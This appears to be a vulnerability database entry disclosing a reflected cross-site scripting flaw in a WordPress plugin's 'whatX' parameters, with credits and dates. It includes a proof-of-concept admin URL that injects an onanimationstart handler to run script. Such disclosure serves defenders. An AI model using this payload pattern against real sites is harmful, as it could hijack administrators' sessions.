The plugin does not properly escape the whatX parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-13 (about 1 years ago)
2022-01-13 (about 1 years ago)
2022-04-09 (about 9 months ago)